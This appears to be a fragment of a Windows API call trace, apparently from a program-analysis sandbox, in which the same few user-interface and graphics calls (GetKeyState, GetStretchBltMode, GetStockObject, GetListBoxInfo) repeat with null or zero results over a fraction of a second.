[0069.447] GetKeyState (nVirtKey=1) returned 0 [0069.447] GetStretchBltMode (hdc=0x1) returned 0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.448] GetKeyState (nVirtKey=1) returned 0 [0069.448] GetStretchBltMode (hdc=0x1) returned 0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.448] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.449] GetKeyState (nVirtKey=1) returned 0 [0069.449] GetStretchBltMode (hdc=0x1) returned 0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.449] GetStockObject (i=789644) returned 0x0 [0069.450] GetStockObject (i=789644) returned 0x0 [0069.450] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.450] GetKeyState (nVirtKey=1) returned 0 [0069.450] GetStretchBltMode (hdc=0x1) returned 0 [0069.450] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.450] GetKeyState (nVirtKey=1) returned 0 [0069.450] GetStretchBltMode (hdc=0x1) returned 0 [0069.450] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.450] GetKeyState (nVirtKey=1) returned 0 [0069.450] GetStretchBltMode (hdc=0x1) returned 0 [0069.450] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.450] GetKeyState (nVirtKey=1) returned 0 [0069.450] GetStretchBltMode (hdc=0x1) returned 0 [0069.450] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.450] GetKeyState (nVirtKey=1) returned 0 [0069.450] GetStretchBltMode (hdc=0x1) returned 0 [0069.451] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.451] GetKeyState (nVirtKey=1) returned 0 [0069.451] GetStretchBltMode (hdc=0x1) returned 0 [0069.451] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.451] GetKeyState (nVirtKey=1) returned 0 [0069.451] GetStretchBltMode (hdc=0x1) returned 0 [0069.451] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.451] GetKeyState (nVirtKey=1) returned 0 [0069.451] GetStretchBltMode (hdc=0x1) returned 0 [0069.451] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.451] GetKeyState (nVirtKey=1) returned 0 [0069.451] GetStretchBltMode (hdc=0x1) returned 0 [0069.451] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.451] GetKeyState (nVirtKey=1) returned 0 [0069.451] GetStretchBltMode (hdc=0x1) returned 0 [0069.451] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.452] GetKeyState (nVirtKey=1) returned 0 [0069.452] GetStretchBltMode (hdc=0x1) returned 0 [0069.452] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.452] GetKeyState (nVirtKey=1) returned 0 [0069.452] GetStretchBltMode (hdc=0x1) returned 0 [0069.452] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.452] GetKeyState (nVirtKey=1) returned 0 [0069.452] GetStretchBltMode (hdc=0x1) returned 0 [0069.452] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.452] GetKeyState (nVirtKey=1) returned 0 [0069.452] GetStretchBltMode (hdc=0x1) returned 0 [0069.452] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.452] GetKeyState (nVirtKey=1) returned 0 [0069.452] GetStretchBltMode (hdc=0x1) returned 0 [0069.452] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.452] GetKeyState (nVirtKey=1) returned 0 [0069.452] GetStretchBltMode (hdc=0x1) returned 0 [0069.453] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.453] GetKeyState (nVirtKey=1) returned 0 [0069.453] GetStretchBltMode (hdc=0x1) returned 0 [0069.453] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.453] GetKeyState (nVirtKey=1) returned 0 [0069.453] GetStretchBltMode (hdc=0x1) returned 0 [0069.453] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.453] GetKeyState (nVirtKey=1) returned 0 [0069.453] GetStretchBltMode (hdc=0x1) returned 0 [0069.453] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.453] GetKeyState (nVirtKey=1) returned 0 [0069.453] GetStretchBltMode (hdc=0x1) returned 0 [0069.453] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.453] GetKeyState (nVirtKey=1) returned 0 [0069.453] GetStretchBltMode (hdc=0x1) returned 0 [0069.453] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.454] GetKeyState (nVirtKey=1) returned 0 [0069.454] GetStretchBltMode (hdc=0x1) returned 0 [0069.454] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.454] GetKeyState (nVirtKey=1) returned 0 [0069.454] GetStretchBltMode (hdc=0x1) returned 0 [0069.454] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.454] GetKeyState (nVirtKey=1) returned 0 [0069.454] GetStretchBltMode (hdc=0x1) returned 0 [0069.454] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.454] GetKeyState (nVirtKey=1) returned 0 [0069.454] GetStretchBltMode (hdc=0x1) returned 0 [0069.454] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.454] GetKeyState (nVirtKey=1) returned 0 [0069.454] GetStretchBltMode (hdc=0x1) returned 0 [0069.454] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.454] GetKeyState (nVirtKey=1) returned 0 [0069.455] GetStretchBltMode (hdc=0x1) returned 0 [0069.455] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.455] GetKeyState (nVirtKey=1) returned 0 [0069.455] GetStretchBltMode (hdc=0x1) returned 0 [0069.455] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.455] GetKeyState (nVirtKey=1) returned 0 [0069.455] GetStretchBltMode (hdc=0x1) returned 0 [0069.455] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.455] GetKeyState (nVirtKey=1) returned 0 [0069.455] GetStretchBltMode (hdc=0x1) returned 0 [0069.455] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.456] GetKeyState (nVirtKey=1) returned 0 [0069.456] GetStretchBltMode (hdc=0x1) returned 0 [0069.456] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.456] GetKeyState (nVirtKey=1) returned 0 [0069.456] GetStretchBltMode (hdc=0x1) returned 0 [0069.456] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.456] GetKeyState (nVirtKey=1) returned 0 [0069.456] GetStretchBltMode (hdc=0x1) returned 0 [0069.456] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.456] GetKeyState (nVirtKey=1) returned 0 [0069.456] GetStretchBltMode (hdc=0x1) returned 0 [0069.456] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.456] GetKeyState (nVirtKey=1) returned 0 [0069.456] GetStretchBltMode (hdc=0x1) returned 0 [0069.456] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.456] GetKeyState (nVirtKey=1) returned 0 [0069.456] GetStretchBltMode (hdc=0x1) returned 0 [0069.457] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.457] GetKeyState (nVirtKey=1) returned 0 [0069.457] GetStretchBltMode (hdc=0x1) returned 0 [0069.457] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.457] GetKeyState (nVirtKey=1) returned 0 [0069.457] GetStretchBltMode (hdc=0x1) returned 0 [0069.457] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.457] GetKeyState (nVirtKey=1) returned 0 [0069.457] GetStretchBltMode (hdc=0x1) returned 0 [0069.457] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.457] GetKeyState (nVirtKey=1) returned 0 [0069.457] GetStretchBltMode (hdc=0x1) returned 0 [0069.457] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.457] GetKeyState (nVirtKey=1) returned 0 [0069.457] GetStretchBltMode (hdc=0x1) returned 0 [0069.457] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.458] GetKeyState (nVirtKey=1) returned 0 [0069.458] GetStretchBltMode (hdc=0x1) returned 0 [0069.458] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.458] GetKeyState (nVirtKey=1) returned 0 [0069.458] GetStretchBltMode (hdc=0x1) returned 0 [0069.458] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.458] GetKeyState (nVirtKey=1) returned 0 [0069.458] GetStretchBltMode (hdc=0x1) returned 0 [0069.458] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.458] GetKeyState (nVirtKey=1) returned 0 [0069.458] GetStretchBltMode (hdc=0x1) returned 0 [0069.458] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.458] GetKeyState (nVirtKey=1) returned 0 [0069.458] GetStretchBltMode (hdc=0x1) returned 0 [0069.458] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.458] GetKeyState (nVirtKey=1) returned 0 [0069.458] GetStretchBltMode (hdc=0x1) returned 0 [0069.459] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.459] GetKeyState (nVirtKey=1) returned 0 [0069.459] GetStretchBltMode (hdc=0x1) returned 0 [0069.459] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.459] GetKeyState (nVirtKey=1) returned 0 [0069.459] GetStretchBltMode (hdc=0x1) returned 0 [0069.459] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.459] GetKeyState (nVirtKey=1) returned 0 [0069.459] GetStretchBltMode (hdc=0x1) returned 0 [0069.459] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.459] GetKeyState (nVirtKey=1) returned 0 [0069.459] GetStretchBltMode (hdc=0x1) returned 0 [0069.459] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.459] GetKeyState (nVirtKey=1) returned 0 [0069.459] GetStretchBltMode (hdc=0x1) returned 0 [0069.459] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.460] GetKeyState (nVirtKey=1) returned 0 [0069.460] GetStretchBltMode (hdc=0x1) returned 0 [0069.460] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.460] GetKeyState (nVirtKey=1) returned 0 [0069.460] GetStretchBltMode (hdc=0x1) returned 0 [0069.460] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.460] GetKeyState (nVirtKey=1) returned 0 [0069.460] GetStretchBltMode (hdc=0x1) returned 0 [0069.460] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.460] GetKeyState (nVirtKey=1) returned 0 [0069.460] GetStretchBltMode (hdc=0x1) returned 0 [0069.460] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.460] GetKeyState (nVirtKey=1) returned 0 [0069.460] GetStretchBltMode (hdc=0x1) returned 0 [0069.460] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.460] GetKeyState (nVirtKey=1) returned 0 [0069.460] GetStretchBltMode (hdc=0x1) returned 0 [0069.461] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.461] GetKeyState (nVirtKey=1) returned 0 [0069.461] GetStretchBltMode (hdc=0x1) returned 0 [0069.461] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.461] GetKeyState (nVirtKey=1) returned 0 [0069.461] GetStretchBltMode (hdc=0x1) returned 0 [0069.461] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.461] GetKeyState (nVirtKey=1) returned 0 [0069.461] GetStretchBltMode (hdc=0x1) returned 0 [0069.461] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.461] GetKeyState (nVirtKey=1) returned 0 [0069.461] GetStretchBltMode (hdc=0x1) returned 0 [0069.461] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.461] GetKeyState (nVirtKey=1) returned 0 [0069.461] GetStretchBltMode (hdc=0x1) returned 0 [0069.461] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.462] GetKeyState (nVirtKey=1) returned 0 [0069.462] GetStretchBltMode (hdc=0x1) returned 0 [0069.462] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.462] GetKeyState (nVirtKey=1) returned 0 [0069.462] GetStretchBltMode (hdc=0x1) returned 0 [0069.462] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.462] GetKeyState (nVirtKey=1) returned 0 [0069.462] GetStretchBltMode (hdc=0x1) returned 0 [0069.462] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.462] GetKeyState (nVirtKey=1) returned 0 [0069.462] GetStretchBltMode (hdc=0x1) returned 0 [0069.462] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.462] GetKeyState (nVirtKey=1) returned 0 [0069.462] GetStretchBltMode (hdc=0x1) returned 0 [0069.462] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.462] GetKeyState (nVirtKey=1) returned 0 [0069.462] GetStretchBltMode (hdc=0x1) returned 0 [0069.463] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.463] GetKeyState (nVirtKey=1) returned 0 [0069.463] GetStretchBltMode (hdc=0x1) returned 0 [0069.463] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.463] GetKeyState (nVirtKey=1) returned 0 [0069.463] GetStretchBltMode (hdc=0x1) returned 0 [0069.463] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.463] GetKeyState (nVirtKey=1) returned 0 [0069.463] GetStretchBltMode (hdc=0x1) returned 0 [0069.463] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.463] GetKeyState (nVirtKey=1) returned 0 [0069.463] GetStretchBltMode (hdc=0x1) returned 0 [0069.463] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.463] GetKeyState (nVirtKey=1) returned 0 [0069.463] GetStretchBltMode (hdc=0x1) returned 0 [0069.463] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.464] GetKeyState (nVirtKey=1) returned 0 [0069.464] GetStretchBltMode (hdc=0x1) returned 0 [0069.464] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.464] GetKeyState (nVirtKey=1) returned 0 [0069.464] GetStretchBltMode (hdc=0x1) returned 0 [0069.464] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.464] GetKeyState (nVirtKey=1) returned 0 [0069.464] GetStretchBltMode (hdc=0x1) returned 0 [0069.464] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.464] GetKeyState (nVirtKey=1) returned 0 [0069.464] GetStretchBltMode (hdc=0x1) returned 0 [0069.464] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.464] GetKeyState (nVirtKey=1) returned 0 [0069.464] GetStretchBltMode (hdc=0x1) returned 0 [0069.464] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.464] GetKeyState (nVirtKey=1) returned 0 [0069.465] GetStretchBltMode (hdc=0x1) returned 0 [0069.465] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.465] GetKeyState (nVirtKey=1) returned 0 [0069.465] GetStretchBltMode (hdc=0x1) returned 0 [0069.465] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.465] GetKeyState (nVirtKey=1) returned 0 [0069.465] GetStretchBltMode (hdc=0x1) returned 0 [0069.465] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.465] GetKeyState (nVirtKey=1) returned 0 [0069.465] GetStretchBltMode (hdc=0x1) returned 0 [0069.465] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.465] GetKeyState (nVirtKey=1) returned 0 [0069.465] GetStretchBltMode (hdc=0x1) returned 0 [0069.465] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.465] GetKeyState (nVirtKey=1) returned 0 [0069.465] GetStretchBltMode (hdc=0x1) returned 0 [0069.465] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.466] GetKeyState (nVirtKey=1) returned 0 [0069.466] GetStretchBltMode (hdc=0x1) returned 0 [0069.466] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.466] GetKeyState (nVirtKey=1) returned 0 [0069.466] GetStretchBltMode (hdc=0x1) returned 0 [0069.466] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.466] GetKeyState (nVirtKey=1) returned 0 [0069.466] GetStretchBltMode (hdc=0x1) returned 0 [0069.466] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.466] GetKeyState (nVirtKey=1) returned 0 [0069.466] GetStretchBltMode (hdc=0x1) returned 0 [0069.466] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.466] GetKeyState (nVirtKey=1) returned 0 [0069.466] GetStretchBltMode (hdc=0x1) returned 0 [0069.466] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.466] GetKeyState (nVirtKey=1) returned 0 [0069.467] GetStretchBltMode (hdc=0x1) returned 0 [0069.467] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.467] GetKeyState (nVirtKey=1) returned 0 [0069.467] GetStretchBltMode (hdc=0x1) returned 0 [0069.467] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.467] GetKeyState (nVirtKey=1) returned 0 [0069.467] GetStretchBltMode (hdc=0x1) returned 0 [0069.467] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.467] GetKeyState (nVirtKey=1) returned 0 [0069.467] GetStretchBltMode (hdc=0x1) returned 0 [0069.467] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.467] GetKeyState (nVirtKey=1) returned 0 [0069.467] GetStretchBltMode (hdc=0x1) returned 0 [0069.467] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.467] GetKeyState (nVirtKey=1) returned 0 [0069.467] GetStretchBltMode (hdc=0x1) returned 0 [0069.467] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.468] GetKeyState (nVirtKey=1) returned 0 [0069.468] GetStretchBltMode (hdc=0x1) returned 0 [0069.468] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.468] GetKeyState (nVirtKey=1) returned 0 [0069.468] GetStretchBltMode (hdc=0x1) returned 0 [0069.468] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.468] GetKeyState (nVirtKey=1) returned 0 [0069.468] GetStretchBltMode (hdc=0x1) returned 0 [0069.468] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.468] GetKeyState (nVirtKey=1) returned 0 [0069.468] GetStretchBltMode (hdc=0x1) returned 0 [0069.468] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.468] GetKeyState (nVirtKey=1) returned 0 [0069.468] GetStretchBltMode (hdc=0x1) returned 0 [0069.468] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.468] GetKeyState (nVirtKey=1) returned 0 [0069.469] GetStretchBltMode (hdc=0x1) returned 0 [0069.469] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.469] GetKeyState (nVirtKey=1) returned 0 [0069.469] GetStretchBltMode (hdc=0x1) returned 0 [0069.469] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.469] GetKeyState (nVirtKey=1) returned 0 [0069.469] GetStretchBltMode (hdc=0x1) returned 0 [0069.469] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.469] GetKeyState (nVirtKey=1) returned 0 [0069.469] GetStretchBltMode (hdc=0x1) returned 0 [0069.469] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.469] GetKeyState (nVirtKey=1) returned 0 [0069.469] GetStretchBltMode (hdc=0x1) returned 0 [0069.469] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.469] GetKeyState (nVirtKey=1) returned 0 [0069.469] GetStretchBltMode (hdc=0x1) returned 0 [0069.470] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.470] GetKeyState (nVirtKey=1) returned 0 [0069.470] GetStretchBltMode (hdc=0x1) returned 0 [0069.470] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.470] GetKeyState (nVirtKey=1) returned 0 [0069.470] GetStretchBltMode (hdc=0x1) returned 0 [0069.470] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.470] GetKeyState (nVirtKey=1) returned 0 [0069.470] GetStretchBltMode (hdc=0x1) returned 0 [0069.470] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.470] GetKeyState (nVirtKey=1) returned 0 [0069.470] GetStretchBltMode (hdc=0x1) returned 0 [0069.470] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.470] GetKeyState (nVirtKey=1) returned 0 [0069.470] GetStretchBltMode (hdc=0x1) returned 0 [0069.470] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.503] GetKeyState (nVirtKey=1) returned 0 [0069.503] GetStretchBltMode (hdc=0x1) returned 0 [0069.503] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.503] GetKeyState (nVirtKey=1) returned 0 [0069.503] GetStretchBltMode (hdc=0x1) returned 0 [0069.503] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.503] GetKeyState (nVirtKey=1) returned 0 [0069.503] GetStretchBltMode (hdc=0x1) returned 0 [0069.503] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.503] GetKeyState (nVirtKey=1) returned 0 [0069.504] GetStretchBltMode (hdc=0x1) returned 0 [0069.504] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.504] GetKeyState (nVirtKey=1) returned 0 [0069.504] GetStretchBltMode (hdc=0x1) returned 0 [0069.504] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.504] GetKeyState (nVirtKey=1) returned 0 [0069.504] GetStretchBltMode (hdc=0x1) returned 0 [0069.504] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.504] GetKeyState (nVirtKey=1) returned 0 [0069.504] GetStretchBltMode (hdc=0x1) returned 0 [0069.504] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.504] GetKeyState (nVirtKey=1) returned 0 [0069.504] GetStretchBltMode (hdc=0x1) returned 0 [0069.504] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.504] GetKeyState (nVirtKey=1) returned 0 [0069.504] GetStretchBltMode (hdc=0x1) returned 0 [0069.504] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.505] GetKeyState (nVirtKey=1) returned 0 [0069.505] GetStretchBltMode (hdc=0x1) returned 0 [0069.505] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.505] GetKeyState (nVirtKey=1) returned 0 [0069.505] GetStretchBltMode (hdc=0x1) returned 0 [0069.505] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.505] GetKeyState (nVirtKey=1) returned 0 [0069.505] GetStretchBltMode (hdc=0x1) returned 0 [0069.505] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.505] GetKeyState (nVirtKey=1) returned 0 [0069.505] GetStretchBltMode (hdc=0x1) returned 0 [0069.505] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.505] GetKeyState (nVirtKey=1) returned 0 [0069.505] GetStretchBltMode (hdc=0x1) returned 0 [0069.505] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.506] GetKeyState (nVirtKey=1) returned 0 [0069.506] GetStretchBltMode (hdc=0x1) returned 0 [0069.506] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.506] GetKeyState (nVirtKey=1) returned 0 [0069.506] GetStretchBltMode (hdc=0x1) returned 0 [0069.506] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.506] GetKeyState (nVirtKey=1) returned 0 [0069.506] GetStretchBltMode (hdc=0x1) returned 0 [0069.506] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.506] GetKeyState (nVirtKey=1) returned 0 [0069.506] GetStretchBltMode (hdc=0x1) returned 0 [0069.506] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.506] GetKeyState (nVirtKey=1) returned 0 [0069.506] GetStretchBltMode (hdc=0x1) returned 0 [0069.506] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.506] GetKeyState (nVirtKey=1) returned 0 [0069.506] GetStretchBltMode (hdc=0x1) returned 0 [0069.507] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.507] GetKeyState (nVirtKey=1) returned 0 [0069.507] GetStretchBltMode (hdc=0x1) returned 0 [0069.507] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.507] GetKeyState (nVirtKey=1) returned 0 [0069.507] GetStretchBltMode (hdc=0x1) returned 0 [0069.507] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.507] GetKeyState (nVirtKey=1) returned 0 [0069.507] GetStretchBltMode (hdc=0x1) returned 0 [0069.507] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.507] GetKeyState (nVirtKey=1) returned 0 [0069.507] GetStretchBltMode (hdc=0x1) returned 0 [0069.507] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.507] GetKeyState (nVirtKey=1) returned 0 [0069.507] GetStretchBltMode (hdc=0x1) returned 0 [0069.507] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.508] GetKeyState (nVirtKey=1) returned 0 [0069.508] GetStretchBltMode (hdc=0x1) returned 0 [0069.508] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.508] GetKeyState (nVirtKey=1) returned 0 [0069.508] GetStretchBltMode (hdc=0x1) returned 0 [0069.508] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.508] GetKeyState (nVirtKey=1) returned 0 [0069.508] GetStretchBltMode (hdc=0x1) returned 0 [0069.508] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.508] GetKeyState (nVirtKey=1) returned 0 [0069.508] GetStretchBltMode (hdc=0x1) returned 0 [0069.508] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.508] GetKeyState (nVirtKey=1) returned 0 [0069.508] GetStretchBltMode (hdc=0x1) returned 0 [0069.508] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.508] GetKeyState (nVirtKey=1) returned 0 [0069.508] GetStretchBltMode (hdc=0x1) returned 0 [0069.509] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.509] GetKeyState (nVirtKey=1) returned 0 [0069.509] GetStretchBltMode (hdc=0x1) returned 0 [0069.509] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.509] GetKeyState (nVirtKey=1) returned 0 [0069.509] GetStretchBltMode (hdc=0x1) returned 0 [0069.509] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.509] GetKeyState (nVirtKey=1) returned 0 [0069.509] GetStretchBltMode (hdc=0x1) returned 0 [0069.509] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.509] GetKeyState (nVirtKey=1) returned 0 [0069.509] GetStretchBltMode (hdc=0x1) returned 0 [0069.509] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.509] GetKeyState (nVirtKey=1) returned 0 [0069.509] GetStretchBltMode (hdc=0x1) returned 0 [0069.509] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.510] GetKeyState (nVirtKey=1) returned 0 [0069.510] GetStretchBltMode (hdc=0x1) returned 0 [0069.510] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.510] GetKeyState (nVirtKey=1) returned 0 [0069.510] GetStretchBltMode (hdc=0x1) returned 0 [0069.510] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.510] GetKeyState (nVirtKey=1) returned 0 [0069.510] GetStretchBltMode (hdc=0x1) returned 0 [0069.510] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.510] GetKeyState (nVirtKey=1) returned 0 [0069.510] GetStretchBltMode (hdc=0x1) returned 0 [0069.510] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.510] GetKeyState (nVirtKey=1) returned 0 [0069.510] GetStretchBltMode (hdc=0x1) returned 0 [0069.510] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.510] GetKeyState (nVirtKey=1) returned 0 [0069.510] GetStretchBltMode (hdc=0x1) returned 0 [0069.511] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.511] GetKeyState (nVirtKey=1) returned 0 [0069.511] GetStretchBltMode (hdc=0x1) returned 0 